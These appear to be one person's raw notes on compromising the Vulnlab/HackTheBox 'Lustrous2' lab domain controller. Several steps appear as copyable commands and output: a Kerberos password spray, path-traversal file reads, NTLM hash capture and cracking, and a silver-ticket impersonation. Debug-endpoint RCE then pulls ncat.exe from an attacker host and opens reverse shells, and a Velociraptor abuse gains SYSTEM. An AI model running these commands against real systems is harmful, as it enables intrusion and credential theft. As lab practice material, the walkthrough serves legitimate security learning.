Here is my notes on LUSTROUS2 box from Vulnlab which deployed to Hackthebox.
LUSTROUS2: 10.10.66.32
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
ftp> ls
229 Entering Extended Passive Mode (|||60630|)
125 Data connection already open; Transfer starting.
09-06-24 04:20AM <DIR> Development #EMPTY = NOPE.
09-06-24 11:03PM <DIR> Homes #ACCESS-DENIED therefore NOPE !
08-31-24 12:57AM <DIR> HR #EMPTY = NOPE.
08-31-24 12:57AM <DIR> IT #EMPTY = NOPE.
09-09-24 09:25AM <DIR> ITSEC #audit_draft = Interesting.
08-31-24 12:58AM <DIR> Production #EMPTY = NOPE.
08-31-24 12:58AM <DIR> SEC #EMPTY = NOPE.
ftp> cd ITSEC
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||60644|)
125 Data connection already open; Transfer starting.
09-07-24 02:50AM 207 audit_draft.txt
Homes:
229 Entering Extended Passive Mode (|||60629|)
125 Data connection already open; Transfer starting.
09-06-24 11:03PM <DIR> Aaron.Norman
09-06-24 11:03PM <DIR> Adam.Barnes
09-06-24 11:03PM <DIR> Amber.Ward
09-06-24 11:03PM <DIR> Andrea.Smith
09-06-24 11:03PM <DIR> Ann.Lynch
09-06-24 11:03PM <DIR> Callum.Oliver
09-06-24 11:03PM <DIR> Carly.Walker
09-06-24 11:03PM <DIR> Chelsea.Smith
09-06-24 11:03PM <DIR> Chloe.Hammond
09-06-24 11:03PM <DIR> Christopher.Lawson
09-06-24 11:03PM <DIR> Claire.Parry
09-06-24 11:03PM <DIR> Darren.Lewis
09-06-24 11:03PM <DIR> Deborah.Jones
09-06-24 11:03PM <DIR> Dominic.West
09-06-24 11:03PM <DIR> Duncan.Smith
09-06-24 11:03PM <DIR> Elaine.Gallagher
09-06-24 11:03PM <DIR> Eleanor.Gregory
09-06-24 11:03PM <DIR> Emma.Bell
09-06-24 11:03PM <DIR> Francesca.Norman
09-06-24 11:03PM <DIR> Gary.Richards
09-06-24 11:03PM <DIR> Gerard.Ward
09-06-24 11:03PM <DIR> Glenn.Williams
09-06-24 11:03PM <DIR> Graeme.Pritchard
09-06-24 11:03PM <DIR> Harriet.Richardson
09-06-24 11:03PM <DIR> Henry.Connor
09-06-24 11:03PM <DIR> Howard.Robinson
09-06-24 11:03PM <DIR> Jacqueline.Phillips
09-06-24 11:03PM <DIR> Janice.Collier
09-06-24 11:03PM <DIR> Jasmine.Johnson
09-06-24 11:03PM <DIR> Joan.Wall
09-06-24 11:03PM <DIR> Judith.Francis
09-06-24 11:03PM <DIR> Justin.Williams
09-06-24 11:03PM <DIR> Kyle.Hussain
09-06-24 11:03PM <DIR> Kyle.Lloyd
09-06-24 11:03PM <DIR> Lawrence.Bryan
09-06-24 11:03PM <DIR> Leah.Elliott
09-06-24 11:03PM <DIR> Lewis.Khan
09-06-24 11:03PM <DIR> Liam.Wheeler
09-06-24 11:03PM <DIR> Lisa.Begum
09-06-24 11:03PM <DIR> Louis.Phillips
09-06-24 11:03PM <DIR> Lydia.Parker
09-06-24 11:03PM <DIR> Malcolm.Yates
09-06-24 11:03PM <DIR> Marie.Hill
09-06-24 11:03PM <DIR> Martin.Hamilton
09-06-24 11:03PM <DIR> Mathew.Roberts
09-06-24 11:03PM <DIR> Melissa.Thompson
09-06-24 11:03PM <DIR> Nathan.Carter
09-06-24 11:03PM <DIR> Nicola.Clarke
09-06-24 11:03PM <DIR> Nicola.Hall
09-06-24 11:03PM <DIR> Nigel.Lee
09-06-24 11:03PM <DIR> Pamela.Taylor
09-06-24 11:03PM <DIR> Robert.Russell
09-06-24 11:03PM <DIR> Ryan.Davies
09-06-24 11:03PM <DIR> Ryan.Moore
09-06-24 11:03PM <DIR> Ryan.Rowe
09-06-24 11:03PM <DIR> Samantha.Smith
09-06-24 11:03PM <DIR> Sara.Matthews
09-06-24 11:03PM <DIR> ShareSvc
09-06-24 11:03PM <DIR> Sharon.Birch
09-06-24 11:03PM <DIR> Sharon.Evans
09-06-24 11:03PM <DIR> Stacey.Barber
09-06-24 11:03PM <DIR> Stacey.Griffiths
09-06-24 11:03PM <DIR> Stephanie.Baxter
09-06-24 11:03PM <DIR> Stephanie.Davies
09-06-24 11:03PM <DIR> Steven.Sutton
09-06-24 11:03PM <DIR> Susan.Johnson
09-06-24 11:03PM <DIR> Terence.Jordan
09-06-24 11:03PM <DIR> Thomas.Myers
09-06-24 11:03PM <DIR> Tony.Davies
09-06-24 11:03PM <DIR> Victoria.Williams
09-06-24 11:03PM <DIR> Wayne.Taylor
#CHATGPT is your friend.
Aaron.Norman
Adam.Barnes
Amber.Ward
Andrea.Smith
Ann.Lynch
Callum.Oliver
Carly.Walker
Chelsea.Smith
Chloe.Hammond
Christopher.Lawson
Claire.Parry
Darren.Lewis
Deborah.Jones
Dominic.West
Duncan.Smith
Elaine.Gallagher
Eleanor.Gregory
Emma.Bell
Francesca.Norman
Gary.Richards
Gerard.Ward
Glenn.Williams
Graeme.Pritchard
Harriet.Richardson
Henry.Connor
Howard.Robinson
Jacqueline.Phillips
Janice.Collier
Jasmine.Johnson
Joan.Wall
Judith.Francis
Justin.Williams
Kyle.Hussain
Kyle.Lloyd
Lawrence.Bryan
Leah.Elliott
Lewis.Khan
Liam.Wheeler
Lisa.Begum
Louis.Phillips
Lydia.Parker
Malcolm.Yates
Marie.Hill
Martin.Hamilton
Mathew.Roberts
Melissa.Thompson
Nathan.Carter
Nicola.Clarke
Nicola.Hall
Nigel.Lee
Pamela.Taylor
Robert.Russell
Ryan.Davies
Ryan.Moore
Ryan.Rowe
Samantha.Smith
Sara.Matthews
ShareSvc
Sharon.Birch
Sharon.Evans
Stacey.Barber
Stacey.Griffiths
Stephanie.Baxter
Stephanie.Davies
Steven.Sutton
Susan.Johnson
Terence.Jordan
Thomas.Myers
Tony.Davies
Victoria.Williams
Wayne.Taylor
┌──(root㉿kali)-[/home/…/VL/LUSTROUS2/10.10.66.32/FTP]
└─# cat audit_draft.txt
Audit Report Issue Tracking
[Fixed] NTLM Authentication Allowed
[Fixed] Signing & Channel Binding Not Enabled
[Fixed] Kerberoastable Accounts
[Fixed] SeImpersonate Enabled
[Open] Weak User Passwords
Creds spray with users.txt and users.txt - DON'T BOTHER = NOPE !
Creds spray with users.txt and "" - DON'T BOTHER = NOPE !
Crackmapexec Troubleshooting:
crackmapexec smb 10.10.66.32 -d lustrous2.vl -u users.txt -p 'Lustrous2024' --continue-on-success
SMB 10.10.66.32 445 10.10.66.32 [*] x64 (name:10.10.66.32) (domain:lustrous2.vl) (signing:True) (SMBv1:False)
SMB 10.10.66.32 445 10.10.66.32 [-] lustrous2.vl\Aaron.Norman:Lustrous2024 STATUS_NOT_SUPPORTED
SMB 10.10.66.32 445 10.10.66.32 [-] lustrous2.vl\Adam.Barnes:Lustrous2024 STATUS_NOT_SUPPORTED
SMB 10.10.66.32 445 10.10.66.32 [-] lustrous2.vl\Amber.Ward:Lustrous2024 STATUS_NOT_SUPPORTED
This suggests that NTLM is disabled and authentication is only possible via kerberos. We can spray using crackmapexec and kerberos by adding the -k flag as follows:
crackmapexec smb 10.10.66.32 -d lustrous2.vl -u users.txt -p 'Lustrous2024' --continue-on-success -k
SMB 10.10.66.32 445 10.10.66.32 [-] lustrous2.vl\Thomas.Myers: KDC_ERR_S_PRINCIPAL_UNKNOWN
https://vuln.dev/vulnlab-lustrous2/
53/tcp open domain? Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
#NOTHING and DON'T BOTHER !
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-28 16:09:33Z)
#NO ASREPROASTING = NOPE !
135/tcp open msrpc Microsoft Windows RPC
rpcclient 10.10.66.32 -U "" -c "enumdomusers;quit"
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_NOT_SUPPORTED
#NO ANONYMOUS or GUEST CREDS.
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
ldapsearch -x -H ldap://10.10.66.32 -D '' -w '' -b "DC=lustrous2,DC=vl" '(objectClass=person)'
ldapv3 - account required.
HTTP Silver Ticket: #LINUX
getTGT.py lustrous2.vl/thomas.myers:'Lustrous2024' -dc-ip lustrous2.vl
export KRB5CCNAME=thomas.myers.ccache
curl --negotiate -u : http://lus2dc.lustrous2.vl -I
┌──(root㉿kali)-[/home/…/LUSTROUS2/10.10.66.32/FTP/BLOOD]
└─# getTGT.py lustrous2.vl/thomas.myers:'Lustrous2024' -dc-ip lustrous2.vl
/usr/local/bin/getTGT.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'getTGT.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Saving ticket in thomas.myers.ccache
┌──(root㉿kali)-[/home/…/LUSTROUS2/10.10.66.32/FTP/BLOOD]
└─# export KRB5CCNAME=./thomas.myers.ccache
┌──(root㉿kali)-[/home/…/LUSTROUS2/10.10.66.32/FTP/BLOOD]
└─# klist
Ticket cache: FILE:./thomas.myers.ccache
Default principal: thomas.myers@LUSTROUS2.VL
Valid starting Expires Service principal
11/28/2024 12:44:24 11/28/2024 22:44:24 krbtgt/LUSTROUS2.VL@LUSTROUS2.VL
renew until 11/29/2024 12:44:25
┌──(root㉿kali)-[/home/…/LUSTROUS2/10.10.66.32/FTP/BLOOD]
└─# curl --negotiate -u : http://lus2dc.lustrous2.vl -I
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRvM79WazB+I9B13dyYwh47eeVUYhq
vsOqHh600QZgRpZ4KA33zYrRhMKH4Z+f8hE0bcrnLwh8pypm7c2mQvwVqEbp8nWH1AtnCpsDjubZiPWfjX36ZRHG//myz2Odw43fdDJSSPxCunLRKpwiCIZHS
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Thu, 28 Nov 2024 17:44:30 GMT
Make sure to setup /etc/krb5.conf in order to make this HTTP silver ticket works:
cat /etc/krb5.conf
[libdefaults]
default_realm = LUSTROUS2.VL
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
fcc-mit-ticketflags = true
dns_canonicalize_hostname = false
dns_lookup_realm = false
dns_lookup_kdc = true
k5login_authoritative = false
[realms]
LUSTROUS2.VL = {
kdc = lustrous2.vl
admin_server = lustrous2.vl
default_admin = lustrous2.vl
}
[domain_realm]
.lustrous2.vl = LUSTROUS2.VL
curl --negotiate -u : http://lus2dc.lustrous2.vl -I
curl --negotiate -u : 'http://lus2dc.lustrous2.vl/' -v
curl --negotiate -u : 'http://lus2dc.lustrous2.vl/' -v:
[SNIP]
</thead>
<tbody>
<tr>
<td>audit.txt</td>
<td>
<a href="/File/Download?fileName=audit.txt" class="btn btn-primary">Download</a>
</td>
</tr>
</tbody>
</table>
</main>
[SNIP]
curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=audit.txt' -v:
curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../../../../../../../windows/system32/drivers/etc/hosts' -v:
curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../../Windows/boot.ini' -v:
curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=\\10.8.0.71\a' -v:
curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../web.config' -v:
curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../../Windows/boot.ini' -v
curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../../../../../../../windows/system32/drivers/etc/hosts' -v
curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../web.config' -v
curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../LuShare.dll' -v:
curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../LuShare.dll' --output LuShare.dll
#WORKS without -v: with -v instead.
#WINDOWS LFI WORKS !
#Got the HASH of LUSTROUS2\ShareSvc
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#1Service (ShareSvc)
1g 0:00:00:53 DONE (2024-11-28 13:04) 0.01857g/s 266270p/s 266270c/s 266270C/s #1WIF3Y.."chito"
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
ShareSvc:#1Service
Silver-Ticket to Ryan.Davies impersonate with ShareSvc Credential:
#Ryan.Davies is a member of ShareAdmins group therefore an admin owner of HTTP port 80 website.
getTGT.py lustrous2.vl/ShareSvc:'#1Service' -dc-ip lustrous2.vl
export KRB5CCNAME=ShareSvc.ccache
getST.py -self -impersonate "Ryan.Davies" -k -no-pass lustrous2.vl/ShareSvc -altservice HTTP/lus2dc.lustrous2.vl
getST.py -spn 'HTTP/lus2dc.lustrous2.vl' -dc-ip 'lus2dc.lustrous2.vl' "lustrous2.vl"/"ShareSvc" -hashes :'CA345B5B5E85A8D468FCFBA9F4F8D460' -self -impersonate 'Ryan.Davies' -debug -altservice 'HTTP/lus2dc.lustrous2.vl'
python3 /home/kali/Kali-Tools/attacktive-directory-tools/impacket/examples/getST.py -spn 'HTTP/lus2dc.lustrous2.vl' -dc-ip 'lus2dc.lustrous2.vl' "lustr
ous2.vl"/"ShareSvc" -hashes :'CA345B5B5E85A8D468FCFBA9F4F8D460' -self -impersonate 'Ryan.Davies' -debug -altservice 'HTTP/lus2dc.lustrous2.vl'
export KRB5CCNAME=Ryan.Davies@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache
curl --negotiate -u : http://lus2dc.lustrous2.vl -I
curl --negotiate -u : http://lus2dc.lustrous2.vl -v
curl --negotiate -u : http://lus2dc.lustrous2.vl -v:
<!-- [32/844]
<li class="nav-item">
<a class="nav-link" href="/File/Debug">Debug</a>
</li>
-->
</ul>
<p b-d5yzov7vxd class="nav navbar-text">Well met, LUSTROUS2\Ryan.Davies!</p>
</div>
</div>
#IT WORKS !
/File/Debug requires a PIN so let's access web.config with LFI vulnerability.
curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../web.config' -v:
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="dotnet" arguments=".\LuShare.dll" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="inprocess" />
</system.webServer>
</location>
</configuration>
* Connection #0 to host lus2dc.lustrous2.vl left intact
curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../LuShare.dll' -v:
curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?filename=../../LuShare.dll' --output LuShare.dll
Read LuShare.dll with windows studio or dnspy as usual:
#FOUND THE PIN !
PIN = ba45c518
curl --negotiate -u : -X POST http://lus2dc.lustrous2.vl/File/Debug -d 'pin=ba45c518&command=whoami'
┌──(root㉿kali)-[/home/…/LUSTROUS2/10.10.66.32/FTP/BLOOD]
└─# curl --negotiate -u : -X POST http://lus2dc.lustrous2.vl/File/Debug -d 'pin=ba45c518&command=whoami'
lustrous2\sharesvc
RCE ACHIEVED !
┌──(root㉿kali)-[/home/…/LUSTROUS2/10.10.66.32/FTP/BLOOD]
└─# curl --negotiate -u : -X POST http://lus2dc.lustrous2.vl/File/Debug -d 'pin=ba45c518&command=powershell.exe -c wget http://10.8.0.71/ncat.exe -O C:\Users\Public\ncat.exe '
┌──(root㉿kali)-[/home/…/LUSTROUS2/10.10.66.32/FTP/BLOOD]
└─# curl --negotiate -u : -X POST http://lus2dc.lustrous2.vl/File/Debug -d 'pin=ba45c518&command=C:\Users\Public\ncat.exe -nv 10.8.0.71 1234 -e CMD'
sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.66.32] 60878
Microsoft Windows [Version 10.0.20348.2655]
(c) Microsoft Corporation. All rights reserved.
C:\inetpub\lushare>whoami
whoami
lustrous2\sharesvc
C:\inetpub\lushare>hostname
hostname
LUS2DC
#USER-SHELL !
To access the website with HTTP Silver Ticket in Firefox:
about:config:
network.negotiate-auth.delegation-uris: lus2dc.lustrous2.vl
network.negotiate-auth.trusted-uris: lus2dc.lustrous2.vl
network.negotiate-auth.using-native-gsslib: true
https://ethicxz.github.io/VL-Lustrous2-Machine/
https://vuln.dev/vulnlab-lustrous2/
Impacket Troubleshooting:
https://github.com/fortra/impacket/issues/1328
For anyone else having this issue, make sure you re-install python -m pip install . after doing git pull
C:\>whoami
whoami
lustrous2\sharesvc
C:\>hostname
hostname
LUS2DC
C:\>dir
dir
Volume in drive C is System
Volume Serial Number is 58B1-CECF
Directory of C:\
09/06/2024 07:39 AM <DIR> datastore
09/06/2024 04:37 AM <DIR> inetpub
05/08/2021 12:20 AM <DIR> PerfLogs
09/07/2024 04:41 AM <DIR> Program Files
09/06/2024 04:38 AM <DIR> Program Files (x86)
09/06/2024 05:57 AM <DIR> temp
08/31/2024 12:56 AM <DIR> Users
09/06/2024 07:52 AM 36 user_2e9c1.txt
09/07/2024 04:55 AM <DIR> Windows
1 File(s) 36 bytes
8 Dir(s) 4,526,194,688 bytes free
C:\>type user_2e9c1.txt
type user_2e9c1.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC:
C:\Program Files\VelociraptorServer>dir
dir
Volume in drive C is System
Volume Serial Number is 58B1-CECF
Directory of C:\Program Files\VelociraptorServer
09/06/2024 07:34 AM <DIR> .
09/07/2024 04:41 AM <DIR> ..
09/06/2024 07:34 AM 2,563 client.config.yaml
09/06/2024 07:34 AM 12,972 server.config.yaml
09/06/2024 07:03 AM 60,144,064 velociraptor-v0.72.4-windows-amd64.exe
3 File(s) 60,159,599 bytes
2 Dir(s) 4,524,945,408 bytes free
velociraptor run on tcp port 8889.
TCP 127.0.0.1:8001 0.0.0.0:0 LISTENING 2536
TCP 127.0.0.1:8001 127.0.0.1:49695 ESTABLISHED 2536
TCP 127.0.0.1:8003 0.0.0.0:0 LISTENING 2536
TCP 127.0.0.1:8889 0.0.0.0:0 LISTENING 2536
./chisel server -p 8000 --reverse
chisel.exe client 10.8.0.71:8000 R:8889:localhost:8889
Check Program Files including 32 bit and 64 bit like Program Files x64 to discover if there are any vulnerable programs.
VelociraptorServer Windows Priv ESC:
C:\PROGRA~1\VelociraptorServer>velociraptor-v0.72.4-windows-amd64.exe --config server.config.yaml config api_client --name admin --role administrator c:\temp\api.config.yaml
C:\PROGRA~1\VelociraptorServer>velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['cmd','/c','whoami'])
https://vuln.dev/vulnlab-lustrous2/#escalating-privileges-using-velociraptor
C:\Program Files\VelociraptorServer>velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['cmd','/c','whoami'])
velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['cmd','/c','dir C:\\Users\\Public'])
velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['cmd','/c','C:\\Users\\Public\ncat.exe -nv 10.8.0.71 -e CMD'])
sudo rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.66.32] 60006
Microsoft Windows [Version 10.0.20348.2655]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>hostname
hostname
LUS2DC
SYSTEM-SHELL !
C:\Users\Administrator\Desktop>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
hostname
LUS2DC
C:\Users\Administrator\Desktop>type root.txt
type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
445/tcp open microsoft-ds?
smbclient -N -L 10.10.66.32
session setup failed: NT_STATUS_NOT_SUPPORTED
#NO ANONYMOUS or GUEST CREDS.
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
55830/tcp open msrpc Microsoft Windows RPC
55859/tcp open msrpc Microsoft Windows RPC
Service Info: Host: LUS2DC; OS: Windows; CPE: cpe:/o:microsoft:windows